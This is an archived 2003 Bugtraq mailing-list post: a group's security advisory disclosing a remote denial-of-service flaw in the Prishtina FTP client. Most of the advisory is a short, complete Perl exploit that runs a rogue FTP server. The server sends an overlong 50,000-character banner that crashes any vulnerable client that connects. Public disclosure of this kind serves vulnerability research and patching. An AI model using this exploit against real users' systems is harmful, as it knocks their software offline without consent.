lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <12411537119.20030521205851@mail.ru>
Date: Wed, 21 May 2003 20:58:51 -0700
From: D4rkGr3y <grey_1999@...l.ru>
To: bugtraq@...urity.nnov.ru, bugtraq@...urityfocus.com
Subject: Prishtina FTP v.1.*: remote DoS


-----BEGIN PGP SIGNED MESSAGE-----

###############################################################*
#          Damage Hacking Group security advisory
#                     www.dhgroup.org
###############################################################*
#Product: Prishtina FTP v.1.*
#Authors: G.Syla [www.prishtina-soft.com]
#Vulnerability: remote DoS
###############################################################*

#Overview#------------------------------------------------------#
Just ftp client..

#Problem#-------------------------------------------------------#
It's possible to crash ftp-client by sending long ftp-banner to
it.

#Exploit#-------------------------------------------------------#
#!/usr/bin/perl
use IO::Socket;
$host = "localhost";
$port = "21";
$server = IO::Socket::INET->new(LocalPort => $port, Type =>
SOCK_STREAM,
Reuse => 1, Listen => 2) or die "Couldn't create tcp-server.\n";
$data = "A";
$num = "50000";
$buf .= $data x $num;
while ($client = $server->accept()) {
 print "OK";
 print $client "$buf\n";
 close($client);
}

#wow#-----------------------------------------------------------#
%$#@ www.dhgroup.org -=> opened English version! Come on in :)

#eof

Best regards               www.dhgroup.org
  D4rkGr3y                    icq 540981

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQCVAwUBPsxK9W4LIpseSJmPAQELvwQAt9Adn0/OjjP9tvOKL8UbyGRBacPS3Xrf
X0Q5ocG/coH4hH0E9iDtHItmM8XLkhnF66FiJeBBveTSooohS73Gl9T+MNwxdT1+
46V8SAuq0Jsz8oHTNgGJ2ZGx0E8+3rXCfmngJWSJ0SJaXcEg+a04uidLi74YN0yH
RqkMTrGenPI=
=3a5T
-----END PGP SIGNATURE-----



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ